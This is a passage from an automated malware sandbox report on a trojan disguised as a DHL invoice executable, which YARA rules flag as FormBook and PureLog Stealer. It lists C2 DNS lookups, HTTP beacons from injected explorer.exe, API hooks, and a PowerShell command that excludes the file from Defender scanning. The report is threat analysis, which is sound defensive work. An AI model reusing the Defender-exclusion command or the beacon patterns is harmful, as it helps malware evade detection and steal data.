Feb 21, 2024 14:38:00.806783915 CET	53	62546	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 21, 2024 14:34:54.198509932 CET	192.168.2.8	1.1.1.1	0x64f0	Standard query (0)	www.rdlva.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:35:13.182126045 CET	192.168.2.8	1.1.1.1	0x9d1b	Standard query (0)	www.ae-skinlab.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:35:55.057487011 CET	192.168.2.8	1.1.1.1	0xb89a	Standard query (0)	www.quickfibrokers.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:36:15.478955030 CET	192.168.2.8	1.1.1.1	0x6230	Standard query (0)	www.permanentday.space	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:36:37.307163000 CET	192.168.2.8	1.1.1.1	0x4b3a	Standard query (0)	www.usetruerreview.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:36:57.682596922 CET	192.168.2.8	1.1.1.1	0x7ace	Standard query (0)	www.bigtexture.xyz	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:37:18.773803949 CET	192.168.2.8	1.1.1.1	0xb44c	Standard query (0)	www.baerana.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:37:39.182940006 CET	192.168.2.8	1.1.1.1	0x42dc	Standard query (0)	www.yassa-hany.online	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:37:59.576106071 CET	192.168.2.8	1.1.1.1	0x59a5	Standard query (0)	www.taxibactrungnam.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:38:00.572196007 CET	192.168.2.8	1.1.1.1	0x59a5	Standard query (0)	www.taxibactrungnam.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 21, 2024 14:34:54.370790005 CET	1.1.1.1	192.168.2.8	0x64f0	No error (0)	www.rdlva.com	rdlva.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 14:34:54.370790005 CET	1.1.1.1	192.168.2.8	0x64f0	No error (0)	rdlva.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:34:54.370790005 CET	1.1.1.1	192.168.2.8	0x64f0	No error (0)	rdlva.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:35:13.387804985 CET	1.1.1.1	192.168.2.8	0x9d1b	No error (0)	www.ae-skinlab.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 14:35:13.387804985 CET	1.1.1.1	192.168.2.8	0x9d1b	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 14:35:13.387804985 CET	1.1.1.1	192.168.2.8	0x9d1b	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:35:55.187500000 CET	1.1.1.1	192.168.2.8	0xb89a	No error (0)	www.quickfibrokers.com	quickfibrokers.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 14:35:55.187500000 CET	1.1.1.1	192.168.2.8	0xb89a	No error (0)	quickfibrokers.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:35:55.187500000 CET	1.1.1.1	192.168.2.8	0xb89a	No error (0)	quickfibrokers.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:36:15.576605082 CET	1.1.1.1	192.168.2.8	0x6230	Name error (3)	www.permanentday.space	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:36:37.538652897 CET	1.1.1.1	192.168.2.8	0x4b3a	Name error (3)	www.usetruerreview.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:36:57.778846025 CET	1.1.1.1	192.168.2.8	0x7ace	Name error (3)	www.bigtexture.xyz	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:37:18.939240932 CET	1.1.1.1	192.168.2.8	0xb44c	No error (0)	www.baerana.com		91.195.240.117	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:37:39.411945105 CET	1.1.1.1	192.168.2.8	0x42dc	No error (0)	www.yassa-hany.online		103.224.212.213	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:38:00.806723118 CET	1.1.1.1	192.168.2.8	0x59a5	No error (0)	www.taxibactrungnam.com	taxibactrungnam.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 14:38:00.806723118 CET	1.1.1.1	192.168.2.8	0x59a5	No error (0)	taxibactrungnam.com		103.167.199.20	A (IP address)	IN (0x0001)	false
Feb 21, 2024 14:38:00.806783915 CET	1.1.1.1	192.168.2.8	0x59a5	No error (0)	www.taxibactrungnam.com	taxibactrungnam.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 14:38:00.806783915 CET	1.1.1.1	192.168.2.8	0x59a5	No error (0)	taxibactrungnam.com		103.167.199.20	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.rdlva.com

www.ae-skinlab.com

www.quickfibrokers.com

www.baerana.com

www.yassa-hany.online

www.taxibactrungnam.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49714	3.33.130.190	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 14:34:54.459743977 CET	163	OUT	GET /pz08/?N6Ahw=3ffl2F0Punah42&Ap=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjMlkSkRNL9P+ HTTP/1.1 Host: www.rdlva.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 21, 2024 14:34:54.554198027 CET	306	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 21 Feb 2024 13:34:54 GMT Content-Type: text/plain Content-Length: 0 Connection: close Location: https://www.rdlva.com/pz08/?N6Ahw=3ffl2F0Punah42&Ap=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjMlkSkRNL9P+ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49716	34.149.87.45	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 14:35:13.479775906 CET	168	OUT	GET /pz08/?Ap=2oeA2CX1Q61jX45FJrFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxDLCxYuKaEo&N6Ahw=3ffl2F0Punah42 HTTP/1.1 Host: www.ae-skinlab.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 21, 2024 14:35:13.581985950 CET	346	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Wed, 21 Feb 2024 13:35:13 GMT X-Served-By: cache-iad-kjyo7100142-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k= Via: 1.1 google glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49720	15.197.142.173	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 14:35:55.287925959 CET	172	OUT	GET /pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42 HTTP/1.1 Host: www.quickfibrokers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 21, 2024 14:35:55.383419037 CET	266	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Wed, 21 Feb 2024 13:35:55 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49721	91.195.240.117	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 14:37:19.115942001 CET	165	OUT	GET /pz08/?Ap=iUtqEraofiOoamAGmz9y1BZqdP67NXRhW/u/s4hsis3XwB7pF+A9OlO8MXjIW5A/mozx&N6Ahw=3ffl2F0Punah42 HTTP/1.1 Host: www.baerana.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 21, 2024 14:37:19.354584932 CET	1286	IN	HTTP/1.1 200 OK date: Wed, 21 Feb 2024 13:37:19 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Z/ryV7VBcR+45hF4Cw+bbaGCUaB0IIRd6Xz1jmAC7fWm+mByxrf168+4qnwOuVjfrGTsAdcGEp5pk5Sya6TVSg== last-modified: Wed, 21 Feb 2024 13:37:19 GMT x-cache-miss-from: parking-6db66cd898-zpcjt server: NginX connection: close Data Raw: 32 45 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 5a 2f 72 79 56 37 56 42 63 52 2b 34 35 68 46 34 43 77 2b 62 62 61 47 43 55 61 42 30 49 49 52 64 36 58 7a 31 6a 6d 41 43 37 66 57 6d 2b 6d 42 79 78 72 66 31 36 38 2b 34 71 6e 77 4f 75 56 6a 66 72 47 54 73 41 64 63 47 45 70 35 70 6b 35 53 79 61 36 54 56 53 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 62 61 65 72 61 6e 61 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 62 61 65 72 61 6e 61 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 61 65 72 61 6e 61 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 Data Ascii: 2EE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Z/ryV7VBcR+45hF4Cw+bbaGCUaB0IIRd6Xz1jmAC7fWm+mByxrf168+4qnwOuVjfrGTsAdcGEp5pk5Sya6TVSg==><head><meta charset="utf-8"><title>baerana.com - baerana Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="baerana.com is your first and best source for all of the information youre looking for. From general topi
Feb 21, 2024 14:37:19.354609013 CET	1286	IN	Data Raw: 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 62 61 65 72 61 6e 61 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 Data Ascii: cs to more of what you would expect to find here, baerana.com has it all. We hope you find what you are searching for!"><link rel=570"icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"
Feb 21, 2024 14:37:19.354623079 CET	1286	IN	Data Raw: 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 61 75 64 69 6f 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f Data Ascii: b{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-
Feb 21, 2024 14:37:19.354641914 CET	1286	IN	Data Raw: 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 Data Ascii: ce:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#313131;text-align:center;padding:0 5px}.announcement p{color:#848484}
Feb 21, 2024 14:37:19.354655027 CET	1286	IN	Data Raw: 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 Data Ascii: -block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-h
Feb 21, 2024 14:37:19.354686022 CET	1286	IN	Data Raw: 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 Data Ascii: st-element-link:focus{text-decoration:underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-s
Feb 21, 2024 14:37:19.354707956 CET	1286	IN	Data Raw: 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 Data Ascii: ock}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{f
Feb 21, 2024 14:37:19.354759932 CET	1286	IN	Data Raw: 74 69 61 6c 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 Data Ascii: tial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;bor
Feb 21, 2024 14:37:19.354774952 CET	1286	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 Data Ascii: ound-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;r
Feb 21, 2024 14:37:19.354834080 CET	1052	IN	Data Raw: 6f 53 65 6c 6c 22 3a 66 61 6c 73 65 2c 22 63 64 6e 48 6f 73 74 22 3a 22 68 74 74 70 3a 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 22 2c 22 61 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 Data Ascii: oSell":false,"cdnHost":"http://img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Z/ryV7VBcR+45hF4Cw+bbaGCUaB0IIR
Feb 21, 2024 14:37:19.529478073 CET	1286	IN	Data Raw: 31 43 34 0d 0a 2c 22 74 6f 6b 65 6e 22 3a 7b 22 70 61 67 65 4c 6f 61 64 65 64 22 3a 22 61 30 65 65 39 39 35 35 62 64 63 35 61 37 33 33 30 31 37 30 38 35 32 32 36 33 39 35 33 62 31 38 31 61 63 38 33 38 63 39 66 64 22 7d 7d 2c 22 67 46 65 65 64 53 Data Ascii: 1C4,"token":{"pageLoaded":"a0ee9955bdc5a7330170852263953b181ac838c9fd"}},"gFeedSES":{"default":"OAkwZGRmNmFhZGIyYjNlODU2YWQ1ZjY3ZWIwNzI5ZTU4ZgkxMjAxCTEzCTAJCTU2OTkzOTYxMQliYWVyYW5hCTMwNjUJMQk1CTU5CTE3MDg1MjI2MzkJMAlOCTAJMAkwCTEyMDUJNTU4NzQ2N

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49722	103.224.212.213	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 14:37:39.569983959 CET	171	OUT	GET /pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR HTTP/1.1 Host: www.yassa-hany.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 21, 2024 14:37:39.763426065 CET	435	IN	HTTP/1.1 302 Found date: Wed, 21 Feb 2024 13:37:39 GMT server: Apache set-cookie: __tad=1708522659.3408500; expires=Sat, 18-Feb-2034 13:37:39 GMT; Max-Age=315360000 location: http://ww25.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR&subid1=20240222-0037-39f7-b636-081468e26bcd content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49723	103.167.199.20	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 14:38:01.164210081 CET	173	OUT	GET /pz08/?Ap=bKUMdxsXbZ20XGxWaFGGS8S5qdUvksLLWvMweKpTgT2MARQxqrmnXGgSr/TayxAxMgg2&N6Ahw=3ffl2F0Punah42 HTTP/1.1 Host: www.taxibactrungnam.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 21, 2024 14:38:01.520893097 CET	304	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 21 Feb 2024 13:38:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEA

Target ID:	0
Start time:	14:34:06
Start date:	21/02/2024
Path:	C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Imagebase:	0x540000
File size:	727'552 bytes
MD5 hash:	57C1720399FE09AE9CB92000D830260A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1469792389.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1473298429.0000000005370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1473432091.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1467009069.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1467009069.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:34:11
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Imagebase:	0xda0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:34:12
Start date:	21/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:34:12
Start date:	21/02/2024
Path:	C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Imagebase:	0xea0000
File size:	727'552 bytes
MD5 hash:	57C1720399FE09AE9CB92000D830260A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:34:12
Start date:	21/02/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.3899090558.000000000E089000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	14:34:15
